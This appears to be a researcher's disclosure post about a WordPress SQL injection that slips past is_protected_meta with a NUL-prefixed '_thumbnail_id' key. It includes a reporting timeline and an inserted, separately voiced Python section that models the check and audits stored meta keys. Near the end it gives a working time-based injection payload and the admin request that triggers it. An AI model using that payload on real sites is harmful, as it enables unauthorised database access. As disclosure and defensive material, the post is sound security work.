I found this vulnerability after reading slavco's posts, and reported it to the WordPress team via HackerOne on Sep. 2nd, 2017. Unfortunately, the WordPress team did not pay attention to this report either.
- Wordpress SQLi by slavco
- Wordpress SQLi — PoC by slavco
- Wordpress SQLi — how to find by slavco
- Disclosure: WordPress WPDB SQL Injection - Technical by ircmaxell
If you have already found the potential SQLi in WordPress, you will know that we need to insert our payload into the _thumbnail_id meta in order to launch the SQLi attack. This vulnerability was mentioned in slavco's post: Wordpress SQLi
1) A normal query for _thumbnail_id
2) Change the meta_value of _thumbnail_id to "\x00_thumbnail_id"
3) Query by _thumbnail_id again
This is the is_protected_meta method (./wp-includes/meta.php) used to validate post meta:
The code only checks the first character of $meta_key; using the MySQL trick, we can use %00_ to bypass it.
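The weakness described above is that a first-character check cannot see a key whose first byte is a NUL. As an added example (not WordPress's own code), the following Python models the legacy check beside a hardened one that discards control characters before looking at the leading underscore, rejects keys containing control characters outright, and audits a constructed set of postmeta rows for keys that the two checks classify differently. The control-character policy, the function names and the sample rows are assumptions made for this illustration.

```python
import re

# Hypothetical policy: no C0 control character (including NUL), DEL, or C1
# control character belongs in a meta key name.
_CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f]")


def is_protected_meta_legacy(meta_key: str) -> bool:
    """Model of the check the post describes: only the first character is inspected."""
    return len(meta_key) > 0 and meta_key[0] == "_"


def is_protected_meta_hardened(meta_key: str) -> bool:
    """Classify the key only after control characters have been removed,
    so a leading NUL cannot hide the underscore."""
    cleaned = _CONTROL.sub("", meta_key)
    return cleaned.startswith("_")


def is_valid_meta_key(meta_key: str) -> bool:
    """Reject empty keys and any key carrying a control character."""
    return bool(meta_key) and _CONTROL.search(meta_key) is None


def audit_postmeta(rows):
    """Flag rows whose meta_key contains control characters or would pass the
    legacy check while being a protected key under the hardened one.

    rows: iterable of (meta_id, post_id, meta_key) tuples.
    Returns a list of (meta_id, post_id, meta_key, reasons)."""
    findings = []
    for meta_id, post_id, meta_key in rows:
        reasons = []
        if _CONTROL.search(meta_key):
            reasons.append("control character in meta_key")
        if is_protected_meta_hardened(meta_key) and not is_protected_meta_legacy(meta_key):
            reasons.append("masquerades as protected key")
        if reasons:
            findings.append((meta_id, post_id, meta_key, reasons))
    return findings


# Constructed sample rows; row 3 carries the NUL-prefixed key from the post.
SAMPLE_ROWS = [
    (1, 55, "_thumbnail_id"),
    (2, 55, "my_custom_field"),
    (3, 55, "\x00_thumbnail_id"),
]


if __name__ == "__main__":
    for meta_id, post_id, key, reasons in audit_postmeta(SAMPLE_ROWS):
        print(f"meta_id={meta_id} post_id={post_id} key={key!r}: {', '.join(reasons)}")
```

In practice the validity check belongs at the point where user-supplied meta keys enter the application, before any protected-key decision is made; the audit function is the kind of one-off pass a site owner would run over an export of wp_postmeta to find keys that were already stored.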
- Add a new custom field with Name: 55 %1$%s or sleep(10)# and click the Add Custom Field button.
- Modify the HTTP request.
- Launch the attack: visit /wp-admin/edit.php?action=delete&_wpnonce=xxx&ids=55 %1$%s or sleep(10)#.
- Sep. 2nd - I reported the vulnerability to the WP team via HackerOne.
- Sep. 6th - The WP team asked for details.
- Sep. 6th - I posted the details.
- Sep. 6th to now - I have not received any response yet.